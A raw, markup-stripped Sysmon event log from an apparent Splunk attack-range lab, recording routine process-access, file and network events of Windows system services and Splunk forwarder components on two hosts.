19:18:20.247{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095165Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.247{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095164Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.247{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095163Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.247{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095162Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.246{761B69BB-818A-607D-0500-00000000BA01}408424C:\Windows\system32\csrss.exe{761B69BB-7A7C-6080-9A5F-00000000BA01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095161Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.246{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7A7C-6080-9A5F-00000000BA01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095160Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.246{761B69BB-7A7C-6080-9A5F-00000000BA01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001095159Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.184{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF70B79093DF7A690E8CC4B7CA514CC5,SHA256=DC7A5430D9C431D08593261A67CF3E4B2CE61B1FF7D8508310413BDFFAE5A81E,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606105Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:20.088{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606104Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:20.088{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=590CDD202F12FB976EA219784459AE3F,SHA256=C39D288DEA1E6FFB36E0F0092EC0A209E79654A38D0003A6E69493E9B3C5504Afalsefalse - insufficient disk space 23542300x80000000000000001095204Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:21.652{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C39B8E44B6C628347BF747524DFDF25,SHA256=1F956B89228C7807414694AAD0081A30034A23789FA346F8DD97BB4CF046616F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095203Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:21.505{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095202Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:21.505{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606107Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:21.090{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606106Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:21.090{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3EBAF8B0065629B8D96F5EA6CE6245C,SHA256=4840B8A0CB28F3D889C06E7FA9088316372BD6EF1F4E6182E52BC29A3C73593Efalsefalse - insufficient disk space 23542300x80000000000000001095208Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:22.967{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=59775ECBC322A9ADDD818B7DAF67AB2A,SHA256=BAFDC6902D5BC02F74C5DC828A85701F837B6C96B0CEC840953D774C4EF5616C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095207Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:22.509{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=919092A467298BDBA985FE694DCF0B41,SHA256=2F8AB510859E31DEA941BD486D129B6E24CAC52ADC05574E0DBACAE3BE22079D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001606114Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:20.703{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49731-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606113Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:22.175{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606112Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:22.175{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9AF864EC5EFE2D1BA601B1771E5783C3,SHA256=79095C3C1E91AF57C8C85E555F9A2E139868A7A50510CC3486FD9BCEC3ADE0D2falsefalse - insufficient disk space 11241100x80000000000000001606111Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:22.175{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606110Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:22.175{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5691726ECF6E19D2399493C1470CE1DE,SHA256=CB04D98D49C60A0C10FB57FE64E8493089F65F6D2A497F6B09C58281D06CF12Efalsefalse - insufficient disk space 11241100x80000000000000001606109Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:22.092{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606108Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:22.092{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B034882375937D1EC6DB218261E8583B,SHA256=058DCA941D4720241F2230C88606D97DADB7E6AA2C8A55804245C0D741999071falsefalse - insufficient disk space 10341000x80000000000000001095206Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:22.506{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095205Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:22.506{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095211Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:23.515{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=482012F23F1CF531E987144B8B2CDBDF,SHA256=BB0CA5984C2C7E28DA12FB81A8E8F224F0C92036A8EE3BD58324F403741E34A2,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606116Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:23.095{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606115Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:23.095{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C46FFA979193259521323BFA10B606B,SHA256=7FCC5EFBB62B90E19C35AE8739859D8E210711D3868EEB4C19A3C7D9E44A86F5falsefalse - insufficient disk space 10341000x80000000000000001095210Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:23.507{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095209Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:23.507{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095214Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:24.538{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADBE38EE9A1784318F486BFF0B01769B,SHA256=0E9C0B8AC3A5B67899E5119E380ED20524F6F0C19A78E5A67A41DF72D7745269,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606118Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:24.097{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606117Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:24.097{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C72908268928EC588E45ADD520CFBFE1,SHA256=BEFC3E614FCF3B03920C510B3F1FE4F9C4D693DA098ED7BBF98A554D197B4C06falsefalse - insufficient disk space 10341000x80000000000000001095213Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:24.508{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095212Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:24.508{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001095221Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:21.056{761B69BB-818A-607D-0B00-00000000BA01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local1154-true0:0:0:0:0:0:0:1win-dc-982.attackrange.local389ldap 354300x80000000000000001095220Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:21.056{761B69BB-819C-607D-2400-00000000BA01}2752C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local1154-true0:0:0:0:0:0:0:1win-dc-982.attackrange.local389ldap 354300x80000000000000001095219Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.663{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1153-false10.0.1.12-8000- 23542300x80000000000000001095218Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:25.552{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD496C33F757225D205A29F008E36FC7,SHA256=8302AC2DA8947DD0661D6D8B221A9D241695EB44A1F77913C74DBB72DBBDB6E7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606120Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:25.115{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606119Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:25.115{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AC15B6370C483F590186D99F4C6764B,SHA256=96C73DCC35BD835A933D25AB924FBE3B6FC9CF006F9CA0866C9902769B8110FDfalsefalse - insufficient disk space 10341000x80000000000000001095217Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:25.508{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095216Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 